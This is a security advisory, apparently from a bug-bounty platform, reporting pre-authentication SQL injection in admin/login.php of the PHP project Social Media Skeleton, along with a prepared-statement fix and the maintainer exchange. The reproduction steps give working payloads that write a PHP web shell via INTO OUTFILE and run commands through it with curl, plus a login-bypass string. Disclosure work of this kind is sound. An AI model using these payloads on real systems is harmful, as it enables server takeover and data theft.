Pre-Auth SQLi leading to RCE in Social Media Skeleton v1.0 in fobybus/social-media-skeleton

Valid

Reported on Aug 1st 2023
Summary

A SQL Injection vulnerability exists in Social Media Skeleton v1.0 via the username and password parameters in admin/login.php. Not to be confused with login.php, which properly escapes special characters.

Issue Description

SQL injection (SQLi) is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. This particular SQLi vulnerability allows UNION based injections, which indirectly leads to RCE.

Improper authorization in a web application undermines its security by exposing sensitive functionalities and resources to unauthorized users. This particular authorization vulnerability allows an unauthorized user to access this resource. Improper authorization is a pervasive problem throughout this application.

The affected script takes values from a POST request and eventually concatenates them into a SQL query (admin/login.php, lines 4-5):

$uemail=$_POST["email"];
$upass=$_POST["password"];

These values are then concatenated directly into the query string without escaping, so they can carry a malicious payload (admin/login.php, lines 8-9):

$query="select * from admin where email='$uemail' and password='$upass'";
$result=mysqli_query($dbcon,$query);

Affected URL/Area

<host>/social-media-skeleton/admin/login.php

Risk Rating

  • Risk: HIGH
  • Difficulty to Exploit: LOW

CVSS Justification

Attack Vector: Network

The vulnerable component is bound to the network stack. The set of possible attackers extends beyond local attacks, up to and including the entire Internet. This kind of vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers).

Attack Complexity: Low

Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.

Privileges Required: None

The attacker is unauthorized prior to the attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.

User Interaction: None

The vulnerable system can be exploited without interaction from any user.

Scope: Changed

An exploited vulnerability can affect resources beyond the security scope managed by the security authority of the vulnerable component.

Confidentiality: High

There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker.

Integrity: High

There is a total loss of data integrity.

Availability: High

There is a total loss of availability.

Steps to reproduce

Attacker makes this request

POST /social-media-skeleton/admin/login.php HTTP/1.1
Host: localhost
Content-Length: 124
Content-Type: application/x-www-form-urlencoded

email=1' UNION SELECT '<?php system($_GET["cmd"]); ?>','','' INTO OUTFILE 'C:\\xampp\\htdocs\\rce.php' -- &password=anything

Or this request:

POST /social-media-skeleton/admin/login.php HTTP/1.1
Host: localhost
Content-Length: 118
Content-Type: application/x-www-form-urlencoded

email=1&password=1' UNION SELECT '<?php system($_GET["cmd"]); ?>','','' INTO OUTFILE 'C:\\xampp\\htdocs\\rce.php' --

The attacker should now be able to use the written PHP script to execute commands:

curl http://localhost/rce.php?cmd=whoami

Affected Demographic/User Base

Any users of this service for their social media are at risk of having their data stolen, manipulated, or destroyed. The host of this server is at risk of system compromise.

Recommended Fix

Do not pass user controlled data to SQL queries. Use prepared statements or parameterized queries instead.
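The fix applied to the query pattern from admin/login.php, as an added example rather than the project's own code: the vulnerable concatenation beside a mysqli prepared statement. It assumes `$dbcon` is the project's existing mysqli connection and keeps the `admin` table and `email`/`password` columns the original query references.

```php
<?php
// Added example, not code from the project. $dbcon is assumed to be the
// project's existing mysqli connection; table and column names are taken
// from the query shown in the report.

mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // throw on SQL errors

/**
 * Vulnerable form (as in admin/login.php): the POST values are spliced into
 * the SQL text, so a single quote in either value rewrites the statement.
 * Kept here only for comparison; do not use.
 */
function adminLoginVulnerable(mysqli $dbcon, string $uemail, string $upass): ?array
{
    $query = "select * from admin where email='$uemail' and password='$upass'";
    $result = mysqli_query($dbcon, $query);
    return $result->fetch_assoc() ?: null;
}

/**
 * Hardened form: the statement is compiled with placeholders first and the
 * user-supplied values are bound afterwards, so they are only ever compared
 * as data. "1' UNION SELECT ..." becomes an email address that matches no row.
 * get_result() needs the mysqlnd driver, which is PHP's default since 5.4.
 */
function adminLoginSafe(mysqli $dbcon, string $uemail, string $upass): ?array
{
    $stmt = $dbcon->prepare('SELECT * FROM admin WHERE email = ? AND password = ?');
    $stmt->bind_param('ss', $uemail, $upass); // 's' binds each value as a string
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Usage mirroring admin/login.php: read the POST fields, then query.
// The plaintext password comparison is the project's own and is out of scope here.
$uemail = $_POST['email'] ?? '';
$upass  = $_POST['password'] ?? '';
$admin  = adminLoginSafe($dbcon, $uemail, $upass);
if ($admin === null) {
    http_response_code(401); // same response whether email or password is wrong
    exit('Login failed');
}
```

Independently of the code change, the INTO OUTFILE step in the report needs the MySQL FILE privilege; the account the application connects with should not hold it, and secure_file_priv should restrict where the server may write files.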

Note

For the issued CVE ID, please credit Michael Blunt as the discovering researcher. List contact email as michael@mik.bz. The author of this project has been contacted and this information has been shared.

Impact

Attack Scenario

An attacker who finds this system can forge a request to the admin/login.php endpoint and create a malicious PHP file. This PHP file can do anything the attacker wants within the confines of the server settings. This can result in remote code execution (RCE) and full control over the affected resource. Additionally, the attacker can call a reverse shell with the permissions of the user running the webapp.

This is a UNION based injection attack, but more generally in the class of SQL injections: Attackers can use these types of attacks to modify, add, or delete data from the remote database.

The attacker could also use this attack to log in as an administrator with the payload:

username=1' OR '1=1' -- &password=anything

Occurrences

We are processing your report and will contact the fobybus/social-media-skeleton team within 24 hours. 2 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago
We have contacted a member of the fobybus/social-media-skeleton team and are waiting to hear back 2 months ago
fobybus gave praise 2 months ago
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
fobybus modified the Severity from Critical (10) to Critical (10) 2 months ago
fobybus
2 months ago

Maintainer


Great work @mblunt 👌 Could you kindly propose/submit a fix for this vulnerability? Any help is appreciated.

fobybus validated this vulnerability 2 months ago
mblunt has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
mblunt
2 months ago

Researcher


Sure thing! I noticed that there were other instances of SQLi throughout the codebase so I have updated them to use parameterized queries. Updated files: social-media-skeleton/admin/atask/add.php social-media-skeleton/admin/atask/setting.php social-media-skeleton/admin/login.php social-media-skeleton/tasks/updatels.php

Also a note about mysql_real_escape_string(). It is generally ok, and will prevent most attackers. However, it is not bulletproof. It can be bypassed in some weird edge cases, which is why parameterized queries are recommended practice.

I did not change the existing mysql_real_escape_string() in some files, like social-media-skeleton/login.php or social-media-skeleton/signup.php. The current implementation in these files is not vulnerable, but it's worth mentioning for a possible improvement.

Hope this helps!

mblunt submitted a
2 months ago
fobybus
2 months ago

Maintainer


Could you make a pull request please!

fobybus marked this as fixed in 1.0.1 with commit 36eb21 2 months ago
mblunt has been awarded the fix bounty
This vulnerability will not receive a CVE
fobybus published this vulnerability 2 months ago
login.php#L8 has been validated